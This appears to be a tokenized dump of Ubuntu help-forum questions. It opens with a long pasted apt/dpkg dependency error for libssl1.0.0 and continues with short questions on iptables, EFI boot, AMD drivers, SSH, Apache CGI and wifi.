state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . ia32-libs-multiarch : i386 : depends : libqtcore4 : i386 but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed libcurl3 : i386 : depends : libssl1.0.0 : i386 ( > = 1.0.0 ) but it is not going to be installed libqt4-dbus : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-declarative : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-designer : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-network : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-opengl : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-qt3support : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-script : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-scripttools : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql-mysql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-svg : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-test : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xml : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xmlpatterns : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqtgui4 : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqtwebkit4 : i386 : depends : libqtcore4 : i386 ( > = 4:4.8.0~ ) but it is not going to be installed libsasl2-modules : i386 : depends : libssl1.0.0 : i386 ( > = 1.0.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i 've also tried sudo apt-get dist-upgrade , sudo apt-get autoremove etc without any luck . i also tried to download the .deb and use dpkg -i , but that failed and did not fully understand the method to be honest . edit this is in response to the comments ref : sudo apt-get install -f does n't fix broken packages . and now ? sudo dpkg -- configure -a -- force-all dpkg : error processing libssl1.0.0 ( -- configure ) : libssl1.0.0 : amd64 1.0.1-4ubuntu5.2 can not be configured because libssl1.0.0 : i386 is in a different version ( 1.0.0e-2ubuntu4.6 ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : also configuring `libssl1.0.0 : i386 ' ( required by `ia32-libs-multiarch : i386 ' ) dpkg : error processing libssl1.0.0 : i386 ( -- configure ) : libssl1.0.0 : i386 1.0.0e-2ubuntu4.6 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.2 ) dpkg : too many errors , stopping errors were encountered while processing : libssl1.0.0 libssl1.0.0 : i386 ... libssl1.0.0 : i386 processing was halted because there were too many errors . ref : package manager does n't work anymore moving /var/lib/kpkg/info/libssl.. kieran @ kieran-ex58-ud3r : ~ $ sudo mv /var/lib/dpkg/info/libssl1.0.0 : i386.postinst /var/lib/dpkg/info/libssl1.0.0 : i386.postinst.bad kieran @ kieran-ex58-ud3r : ~ $ sudo mv /var/lib/dpkg/info/libssl1.0.0 : amd64.postinst /var/lib/dpkg/info/libssl1.0.0 : amd64.postinst.bad kieran @ kieran-ex58-ud3r : ~ $ sudo apt-get -- reinstall install libssl reading package lists ... done building dependency tree reading state information ... done package libssl is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libssl ' has no installation candidate kieran @ kieran-ex58-ud3r : ~ $ sudo apt-get -- reinstall install libssl1.0.0 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . ia32-libs-multiarch : i386 : depends : libqtcore4 : i386 but it is not going to be installed libqt4-dbus : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-declarative : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-designer : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-network : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-opengl : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-qt3support : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-script : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-scripttools : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql-mysql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-svg : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-test : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xml : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xmlpatterns : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqtgui4 : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqtwebkit4 : i386 : depends : libqtcore4 : i386 ( > = 4:4.8.0~ ) but it is not going to be installed libssl1.0.0 : breaks : libssl1.0.0 : i386 ( ! = 1.0.1-4ubuntu5.2 ) but 1.0.0e-2ubuntu4.6 is to be installed libssl1.0.0 : i386 : breaks : libssl1.0.0 ( ! = 1.0.0e-2ubuntu4.6 ) but 1.0.1-4ubuntu5.2 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . kieran @ kieran-ex58-ud3r : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libgtkmm-2.4-1c2a libgtkhtml3.14-19 libglade2-0 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libqtcore4 : i386 libssl1.0.0 : i386 the following new packages will be installed libqtcore4 : i386 the following packages will be upgraded : libssl1.0.0 : i386 1 upgraded , 1 newly installed , 0 to remove and 58 not upgraded . 20 not fully installed or removed . need to get 3,063 kb of archives . after this operation , 9,044 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main libssl1.0.0 i386 1.0.1-4ubuntu5.2 [ 1,002 kb ] get:2 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main libqtcore4 i386 4:4.8.1-0ubuntu4.1 [ 2,061 kb ] fetched 3,063 kb in 4s ( 731 kb/s ) e : internal error , no file name for libssl1.0.0 ref : libssl dependencies removing libssl1.0.0 : i386 kieran @ kieran-ex58-ud3r : ~ $ sudo apt-get remove libssl1.0.0 : i386 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . ia32-libs-multiarch : i386 : depends : libqtcore4 : i386 but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed libcurl3 : i386 : depends : libssl1.0.0 : i386 ( > = 1.0.0 ) but it is not going to be installed libqt4-dbus : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-declarative : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-designer : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-network : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-opengl : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-qt3support : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-script : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-scripttools : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql-mysql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-svg : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-test : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xml : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xmlpatterns : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqtgui4 : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqtwebkit4 : i386 : depends : libqtcore4 : i386 ( > = 4:4.8.0~ ) but it is not going to be installed libsasl2-modules : i386 : depends : libssl1.0.0 : i386 ( > = 1.0.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
143916	iptables sharing internet connection with restricted access	i am trying to configure an ubuntu server to share internet access from eth0 to client systems on eth1 however i only want to allow access in/out on port 1688 and also resolve host names while blocking all other traffic in and out . i 'm not sure what iptable rules are needed to achieve this , hoping for any help . [ outside ] < -- - traffic on port 1688 -- - > { eth0 } [ ubuntu 11.10 server ] { eth1 } < -- -- - > [ client systems ]
143918	efi boot on asus sabertooth 990fx not working after firmware update	i recently updated the firmware on my asus sabertooth 990fx , and now the uefi bios wo n't boot my ubuntu install , which boots off of efi . efi boot works for the livecd , but the bios does n't seem to recognize the ubuntu install anymore , which it did before . any help would be welcome .
143921	how to make shortcut to terminal application ?	i just installed a nifty calculator tool that needs to run from a terminal : tapecalc is there a way to add either a shortcut icon ( or an icon in the dash application area ) or a short cut key combination so i can run this without opening a terminal and then remembering what the app 's name is and then entering tapecalc in the terminal window to start it ?
143924	do i have the latest drivers/software on amd graphics	i need the override section on catalyst control center , but i do n't have it . i want to know if i have the latest version of any kind of amd software . this is what catalyst control center says in the software information section : -catalyst version : 12.4 -driver packaging version : 8.961-12045a-137531c-ati -2d driver version : 8.96.4 -catalyst control center version : 2.14 -randr version : 1.3 btw , i have the ati radeon hd 4850
143927	can i change where `` cd < enter > '' takes me ?	specifically i 'm wondering if , while working on a project , if i do cd it can take me to the root of the project and if i 'm anywhere else then i get the default behaviour .
143931	is there amd overdrive on ubuntu ?	is there amd overdrive on ubuntu ? because i want to install it if possible , but i seem to have the latest amd drivers installed . does anyone have an amd graphics card ? if they do could you please tell me if there is a working overdrive section for catalist control center ? by the way , i have the ati radeon hd 4850 graphics card .
143934	unable to install 12.04	i have downloaded ubuntu 12.04 , made both a bootable usb stick and a iso image dvd . i am not able to install it on my laptop running on windows or my desktop running only on ubuntu 10.04 . further , my desktop has now neither the old version or the new one and i am stuck . unfortunately ubuntu no longer ships free cds and we are stuck with the downloaded version which may be missing something . after entering user name and password , there is some error reported on both laptop and desktop after which it does not respond at all . kindly help .
143935	virtual machine putty connection	i 've created a vm running on my pc and am trying to connect the two via putty . i have putty installed on my pc , and openssh server and client installed on my vm . when i drop my ip address into the putty client , a window will open up , but it 's completely blank . i can highlight the blank window , but ca n't type anything . after a few minutes the window will close from a connection time out . is this my firewall ? ?
143943	how come ubuntu cloud live wont run in a vm ?	so i 'm running the ubuntu cloud live 64bit iso in virtual box , just to play around with it and see what it does . i keep running into the problem that as soon as the ubuntu 12.04 splash screen comes up my entire system ( not just the vm ) crashes and reboots . it appears nothing has been accomplished when i start up the vm again and it repeats the process . is there an explanation for whats causing this issue ? any solution ? host pc is a 64-bit amd dual core with 4gb of ram . i 'm running 12.04 precise ( 32-bit ) as my host os with bios hardware virtualization enabled . the vm ( running ubuntu cloud live ) has 1 gb ram and a 8gb virtual hard drive .
143945	how can i make apache run cgi files in all directories under ./www ?	my friend and i are working on an art site and one of our scripts works fine in most of the upper levels of ./www but once we get down to ./www/testing/project2/cgi-bin/.. cgi files seem to only return 500 errors . the exact same scripts work higher up the directory . any way to coax apache into letting us run this cgi file in these lower directories ?
143947	how do i install libqt4.7.4 ?	i need to use libqt4.7.4 ( or .3 ) on the latest build of ubuntu . is there any easy way to revert to that version . will it break anything ? sudo apt-get install qt4-dev-tools=4.7.4 errors with 'version not found ' .
143952	are there other gestures for the synaptics touchpad besides two-finger scrolling ?	i have a synaptics touchpad on my dell xps 14z and i was wondering if there was any way i could enable some gestures besides two-finger scrolling . are there any special drivers i need ? i 've read somewhere that 12.04 has had some issues with multitouch gestures but i 'm not exactly sure . if there is a way , could someone give me instructions on how to enable ( or get ) these features ? i found some evidence that touchegg may not work with 12.04
143957	compiz not working on 11.10 ?	my pc specifications : dell gx620 pantuim 4 3.20ghz [ ht ] emt64 2g in ram nvidia quadro fx1700 so why ca n't i use compiz effects .
143958	multiple os on one flash drive	i currently have an ubuntu 12.04 copy on my flash drive , but i 'm wondering if i can also have another os on the same flash drive as well . if i put another os on the drive , how will it distinguish between which one i would like to boot upon start up ? will this force me to delete the one in return for the other ? will a boot-loader activate when the other os is detected ? also , will this cause problems considering the fact that 2 oss will be on a single , non-partitioned space , albeit a flash drive , but still . in case you were wondering , or that it matters at all . i will be putting chrome os , gotten here , on with ubuntu 12.04 .
143962	wifi drops after period of time for ubuntu 12.04 on hp pavilion g seres	i have a shiny new hp pavilion g series laptop ( g7 ) . the very first boot of the system was a gparted-live usb to split out some space for ubuntu . the second was a 12.04 live usb . mostly it is working extremely well . the exception is wifi connectivity . it seems to connect at first , but then after anywhere from 30 minutes to four hours i lose connection and can not reconnect until i reboot the router . sometimes an rfkill block and unblock will fix it . and yesterday i saw a suggestion to remove the networkmanager.conf file . the latter seems to have extended the time to failure to hours rather than minutes . what should my next steps be ? thanks
